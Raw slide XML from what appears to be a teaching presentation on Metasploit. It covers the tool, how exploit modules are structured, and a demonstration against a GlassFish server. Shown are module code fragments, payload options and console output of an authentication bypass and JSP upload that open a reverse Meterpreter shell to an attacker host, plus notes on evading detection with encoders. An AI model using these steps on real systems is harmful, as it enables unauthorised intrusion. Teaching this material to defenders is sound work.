          <a:p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options (exploit/multi/http/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glassfish_deployer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endParaRPr lang="en-CA" sz="13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Name       Current Setting  Required  Description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----       ---------------  --------  -----------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APP_RPORT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8080             yes       The Application interface port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PASSWORD                    no        The password for the specified username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PATH       /                yes       The URI path of the GlassFish Server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RHOST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10.0.0.1         yes       The target address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RPORT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4848             yes       The target port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USERNAME   admin            no        The username to authenticate as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="13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Payload options (windows/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meterpreter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reverse_tcp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endParaRPr lang="en-CA" sz="13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Name      Current Setting  Required  Description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----      ---------------  --------  -----------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LHOST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10.0.0.2         yes       The listen address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LPORT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4444             yes       The listen port</a:t>
            </a:r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Basic Theory of Exploiting a System with Metasploit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5.  Exploitation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>and Post-Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Activities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1244780" y="2175148"/>
            <a:ext cx="7431676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300" u="sng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msf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exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1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glassfish_deployer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exploit</a:t>
            </a:r>
          </a:p>
          <a:p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Started reverse handler on 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10.0.0.2:4444 </a:t>
            </a:r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Glassfish edition: GlassFish Server Open Source Edition 3.0.1</a:t>
            </a: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Trying GlassFish authentication bypass..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CC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[+]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://10.0.0.1:4848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 GlassFish - SUCCESSFUL authentication bypass</a:t>
            </a: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Attempting to automatically select a target...</a:t>
            </a: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Uploading payload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Successfully uploaded</a:t>
            </a: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Executing /w9REn53jvtOzvGJPMU/r2MLTenOMJh7VtGbkKku.jsp...</a:t>
            </a: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Sending stage (768512 bytes) to 10.0.0.1</a:t>
            </a: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Meterpreter session 1 opened (10.0.0.2:4444 -&gt; 10.0.0.1:49251) at 2013-11-23 21:25:38 -0500</a:t>
            </a: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Getting information to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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undeploy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Undeploying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w9REn53jvtOzvGJPMU...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA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[*]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Undeployment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complete.</a:t>
            </a:r>
          </a:p>
          <a:p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u="sng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meterpreter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 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C:\glassfishv3\glassfish\domains\domain1\docroot\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="13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428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9388"/>
            <a:ext cx="6705600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2250" b="1" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Metasploit Module Design Goals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7137" y="2051323"/>
            <a:ext cx="8712968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root@bt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="185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CA" sz="1850" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366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~/.msf4/modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1850" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># vi /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="18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msf4/modules/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="18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myExploitModule.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="18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CA" sz="1850" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00868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8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CA" sz="1850" b="1" dirty="0" smtClean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8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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="18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/core</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="18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CA" sz="185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85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CA" sz="185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18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Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="18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CA" sz="18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CA" sz="185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Metasploit3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CA" sz="2000" b="1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CA" sz="2000" b="1" dirty="0" err="1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Msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" b="1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CA" sz="2000" b="1" dirty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Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" b="1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CA" sz="2000" b="1" dirty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Remote </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="33CC33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CA" sz="18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CA" sz="1850" b="1" dirty="0" smtClean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 of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827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Metasploit Module Design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24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r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Randomness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Evasion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>detection systems with encoders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Readability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ommon structure with built-in features leveraged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Usefulness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Proves </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>useful in some way for the exploiter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665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9388"/>
            <a:ext cx="6705600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2250" b="1" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Metasploit Module General Structure</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="225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633" y="445661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3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root@bt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CA" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366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# vi /opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/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glassfish_deployer.rb</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="13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135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sz="13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exploit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        = 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datastore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pass        = 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datastore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path        = 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datastore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my_target_host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rhost.to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="135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rport.to_s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path.to_s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success     = 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session     = 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edition     = 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version     = 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</a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="13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3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#Invoke index to gather some info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res = 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send_request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/common/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="13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index.jsf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CA" sz="13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3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 we get a bad connection, we'd rather not try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35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res.nil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print_error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Unable to get a response from the server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CA" sz="135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35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CA" sz="13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35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res.code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302</a:t>
            </a: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res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="13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send_request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CA" sz="13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login.jsf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="13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3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sz="13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3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sz="13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35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103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Metasploit Module General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r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Modifiable Components:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>(the code delivered that runs remotely after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>exploitation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="640080" lvl="2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Encoders </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>(ensures that payloads are delivered bypassing security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>measures)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="640080" lvl="2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Modules </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>(Exploit and Auxiliary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Exploit – Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>code written using a specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Auxiliary – Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>code written without a payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>specified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37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Metasploit Module General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27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r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Programming Language:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Ruby (.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
              <a:t>rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t> files)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Location of Default Modules:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>opt/metasploit/apps/pro/msf3/modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Location of Personal Modules:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>msf4/modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Loaded in with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>-m &lt;path&gt;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2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Metasploit Module General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r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>Metasploit Core Library and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Information Array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Mixins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" b="1" dirty="0"/>
          </a:p>
          <a:p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1048371" y="2193206"/>
            <a:ext cx="743167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CA" sz="2400" dirty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require</a:t>
            </a:r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2400" dirty="0" err="1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msf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/core</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="24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endParaRPr lang="en-CA" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A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algn="just"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty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Metasploit3</a:t>
            </a:r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CA" sz="2400" dirty="0" err="1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Msf</a:t>
            </a:r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CA" sz="2400" dirty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Exploit</a:t>
            </a:r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CA" sz="2400" dirty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Remote</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="33CC33"/>
              </a:solidFill>
              <a:effectLst/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8371" y="3768941"/>
            <a:ext cx="743167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CA" sz="2400" dirty="0" err="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty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CA" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008689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initialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="24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(info</a:t>
            </a:r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={})</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2400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8375" y="4920977"/>
            <a:ext cx="743167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fr-FR" sz="2400" dirty="0" err="1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include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="24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Msf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fr-FR" sz="2400" dirty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Exploit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fr-FR" sz="2400" dirty="0" err="1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Remote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fr-FR" sz="2400" dirty="0" err="1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HttpClient</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="33CC33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algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1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include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="24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Msf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fr-FR" sz="2400" dirty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Exploit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fr-FR" sz="2400" dirty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EXE</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="33CC33"/>
              </a:solidFill>
              <a:effectLst/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Metasploit Module General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29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r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploit Options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" b="1" dirty="0"/>
          </a:p>
          <a:p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1053139" y="2170956"/>
            <a:ext cx="7431676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CA" sz="1100" dirty="0" err="1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register_options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</a:p>
          <a:p>
            <a:pPr algn="just"/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[</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" smtClean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Opt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CA" sz="1100" dirty="0" err="1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RPORT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4848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),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1" smtClean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OptString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1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.new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APP_RPORT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,[ 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 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The Application interface port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8080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]),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1" smtClean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OptString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1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.new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USERNAME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 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The username to authenticate as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admin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]),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1" smtClean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OptString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1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.new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PASSWORD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 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The password for the specified username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]),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33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OptString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1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.new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 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 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The URI path of the GlassFish Server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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="703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'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])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/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], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="11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self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1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.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" smtClean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endParaRPr lang="en-CA" sz="1100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3139" y="3707507"/>
            <a:ext cx="7431676" cy="22929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300" u="sng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msf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exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1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glassfish_deployer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show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA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options (exploit/multi/http/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glassfish_deployer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endParaRPr lang="en-CA" sz="13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Name       Current Setting  Required  Description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----       ---------------  --------  -----------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RPORT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4848             yes       The target port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3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APP_RPORT</a:t>
            </a:r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8080             yes       The Application interface port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USERNAME   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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            no        The username to authenticate as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PASSWORD                    no        The password for the specified username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA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PATH       /                yes       The URI path of the GlassFish Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12959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9388"/>
            <a:ext cx="6705600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2250" b="1" cap="all" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>METASPLOIT OVERVIEW</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="225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975" y="2689498"/>
            <a:ext cx="52645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____________</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" b="1" dirty="0" smtClean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CA" sz="28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metasploit &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="28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------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="28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\   ,__,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="28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\  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" b="1" dirty="0" err="1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CA" sz="28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)____</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="28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(__)    )\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="28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||--|| *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00868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6187" y="169590"/>
            <a:ext cx="44824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MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM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MMMMMMMMMMM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MMMMMMMMMM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MMMN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                        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MMMNl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MMMNl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MMMMMMMN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NMMMMMMM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MMMNl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MMMMMMMMMNmmmNMMMMMMMMM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MMMNI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MMMMMMMMMMMMMMMMMMMMMMM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MMMNI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MMMMMMMMMMMMMMMMMMMMMMM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MMMNI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MMMNI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MMMNI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MMMNM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MMMNI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WMMMM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MMMMR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MMNM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MMMMNm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`?MMM          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dMMMMM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MMMMMMN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?MM             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?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NMMMMMN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MMMMMMMMNe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JMMMMMNMMM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MMMMMMMMMMNm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eMMMMMNMMNMM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MMMMNNMNMMMMMNx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MMMMMMNMMNMMNM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MMMMMMMMNMMNMMMMm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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+..+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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MMNMMNMNMMNMMNMM</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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Metasploit Module General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r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Body of the Exploit Module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" b="1" dirty="0"/>
          </a:p>
          <a:p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1053139" y="2170956"/>
            <a:ext cx="7431676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exploit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       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datastore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        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datastore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        = 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datastore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my_target_host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rhost.to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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rport.to_s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path.to_s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    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     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edition     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     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</a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-CA" sz="12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 index to gather some info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send_request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/common/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index.jsf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endParaRPr lang="en-CA" sz="12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we get a bad connection, we'd rather not try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res.nil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print_error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Unable to get a response from the server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CA" sz="1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CA" sz="1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CA" sz="12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res.code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302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CA" sz="12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 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send_request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login.jsf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CA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CA" sz="1200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9388"/>
            <a:ext cx="6705600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2250" b="1" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>GlassFish Server Exploitation Demonstration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9761" y="346373"/>
            <a:ext cx="4319464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########                  #</a:t>
            </a:r>
          </a:p>
          <a:p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#################            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######################         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#########################      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############################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##############################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###############################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###############################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##############################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#    ########   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CA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###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####   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###   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####   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####          ##########   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#######################   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####################   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##################  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############      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########        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#########        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############      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########      #########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#####       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###       #########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######    ############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#######################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#   #   ###  #   #   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########################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##     ##   ##     ##</a:t>
            </a:r>
          </a:p>
          <a:p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50" y="1657607"/>
            <a:ext cx="5330158" cy="27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9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b="1" cap="all" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="696464"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="31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8348" y="1581175"/>
            <a:ext cx="8153400" cy="6480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b="1" dirty="0" smtClean="0"/>
              <a:t>Are There Any Questions?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1"/>
            <a:endParaRPr lang="en-CA" b="1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83" y="2204864"/>
            <a:ext cx="6984776" cy="441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9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METASPLOIT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" b="1" cap="all" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="696464"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OVERVIEW</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="3000" cap="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 smtClean="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>source tool, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>maintained by Rapid7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Written in the Ruby programming language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Downloaded more than a million times per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>year</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Largest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>public database of tested </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Available on Windows and UNIX-like platforms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>GUI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>and CLI, with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t> being the most popular</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Used by: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>IT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>professionals </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>for penetration testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Hackers for malicious intent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>IT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>enthusiasts to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>learn about system exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="36576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85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9388"/>
            <a:ext cx="6705600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2250" b="1" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
